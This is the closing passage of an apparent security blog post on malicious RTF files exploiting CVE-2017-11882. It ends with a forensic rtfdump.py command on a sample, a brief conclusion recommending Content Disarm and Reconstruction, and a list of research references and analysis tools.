python rtfdump.py  ed248657afc15600a6b8e5b9cfa94203f9bfeda0ebd1a3007356e99836adeddf.rtf -s 4 -Hi

We will receive:

If we run it without “-Hi” we will receive the object content outside this blog post scope.

In conclusion, the RTF file format is simple, yet it has many capabilities that malware authors take advantage of. Despite being an old CVE-2017-11882, attackers still use it with various modifications.

Content Disarm and Reconstruction (CDR) technology is a great solution to counter this. CDR removes any suspicious attack vectors, whether they are malicious or not.

Our next blog post will continue to delve into the RTF file format attacks and how CDR can prevent the attack.

References

[1] Ran Dubin, “Content Disarm and Reconstruction of RTF Files a Zero File Trust Methodology,” in IEEE Transactions on Information Forensics and Security, vol. 18, pp. 1461-1472, 2023, doi: 10.1109/TIFS.2023.3241480.

[2] Chintan Shah , An Inside Look into Microsoft Rich Text Format and OLE Exploits,  https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/

[3] Omri Herscovici , Microsoft Word Intruder RTF Sample Analysis, https://blog.checkpoint.com/research/microsoft-word-intruder-rtf-sample-analysis/

[4] MalwareBazaar, Free Malware Repository,  https://bazaar.abuse.ch/browse/

[5] OleTools, https://github.com/decalage2/oletools

[6] Yara, The pattern matching Swiss knife for malware researchers, https://virustotal.github.io/yara/

[7] Ditekshen, Yara signatures, https://github.com/ditekshen/detection.

[8] Didier Stevens, rtfdump, https://github.com/DidierStevens/DidierStevensSuite/blob/master/rtfdump.py

[9] CVE-2017-11882, https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11882